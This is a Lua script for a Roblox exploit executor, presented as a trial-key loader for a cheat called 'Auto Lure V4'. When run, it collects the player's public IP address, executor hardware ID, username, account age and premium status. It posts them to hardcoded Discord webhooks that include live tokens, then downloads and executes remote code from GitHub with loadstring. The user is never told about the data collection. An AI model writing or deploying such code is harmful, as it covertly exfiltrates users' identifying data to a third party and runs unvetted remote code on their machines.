
local Key = "Trial1"
local Active = false
local JoinTime = os.time()
local Standart = 5814783

_G.Url = "https://discord.com/api/webhooks/1015974882753917038/PVKkwzgivbvW5jd_8yVfcTyK9Qp8raI6bp41qL7q7_YyS17SuWur-5totMWTCFiZI-a6"

local function WebHook()
    local IP = game:HttpGet("https://v4.ident.me")
    plr = game:GetService'Players'.LocalPlayer
    local premium = false
    local ALT = false
    if plr.MembershipType == Enum.MembershipType.Premium then
        premium = true
    elseif plr.MembershipType == Enum.MembershipType.None then
        premium = false
    end
    if premium == false then 
        if plr.AccountAge <= 70 then 
            ALT = true
        end
    end

    local market = game:GetService("MarketplaceService")
    local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)


    local http_request = http_request;
    if syn then
        http_request = syn.request
    elseif SENTINEL_V2 then
        function http_request(tb)
            return {
                StatusCode = 200;
                Body = request(tb.Url, tb.Method, (tb.Body or ''))
            }
        end
    end

    local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
    local decoded = game:GetService('HttpService'):JSONDecode(body)
    local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
    hwid = "";

    for i, v in next, hwid_list do
        if decoded.headers[v] then
            hwid = decoded.headers[v];
            break
        end
    end

    if hwid then
        local HttpServ = game:GetService('HttpService')
        local url = "https://discord.com/api/webhooks/792782411410833478/s6utp4CwBvUfSYH9YCtf_SxkfLBj_VpReVNaVE4phv8urjGsOodqBpkKSFKZZ_JWG7-f"


        local data = 
            {
                ["content"] = "",
                ["embeds"] = {{
                    ["title"] = "__**HWID:**__",
                    ["description"] = hwid,
                    ["type"] = "rich",
                    ["color"] = 2031871,
                    ["fields"] = {
                        {
                            ["name"] = "Username:",
                            ["value"] = Game.Players.LocalPlayer.Name,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "IP Address:",
                            ["value"] = IP,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Game Link:",
                            ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Game Name:",
                            ["value"] = info.Name,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Age:",
                            ["value"] = plr.AccountAge,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Premium:",
                            ["value"] = premium,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "ALT:",
                            ["value"] = ALT,
                            ["inline"] = true
                        },

                    },
                }}
            }
        local newdata = HttpServ:JSONEncode(data)

        local headers = {
            ["content-type"] = "application/json"
        }

        local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
        http_request(request_payload)
    end
end

local function webhook(url,title,desc,color) --| SENDS LOGS
    local url = url
    local msg = {
        username = "Auto Lure V4",
        avatar_url = "https://cdn.discordapp.com/attachments/364826127711338496/1005580177071423619/unknown.png",
    ["embeds"] = {
        {
            ["title"] = title,
            ["description"] = desc,
            ["type"] = "rich",
            ["color"] = color,
        }
    }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(msg)
    local headers = {
    ["content-type"] = "application/json"
    }
    request = http_request or request or HttpPost or syn.request
    local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
    request(abcdef)
end

if Key == "Trial1" then
    WebHook()
    webhook(_G.Url, "TRIAL STARTED", "Username: " .. game:GetService("Players").LocalPlayer.Name .. "\nTime Elapsed: " .. os.time() - JoinTime .. " seconds ", Standart)
    loadstring(game:HttpGet("https://raw.githubusercontent.com/YourShigeo/PROJECT-SHIGEO/main/Swordburst%202"))()
    Active = true
else
    game:GetService("Players").LocalPlayer:Kick("Trial key doesnt exists now")    
end
if Active == true then
    wait(700)
    webhook(_G.Url, "TRIAL ENDED", "Username: " .. game:GetService("Players").LocalPlayer.Name .. "\nTime Elapsed: " .. os.time() - JoinTime .. " seconds ", Standart)
    game:GetService("Players").LocalPlayer:Kick("Trial ended :c")   
end

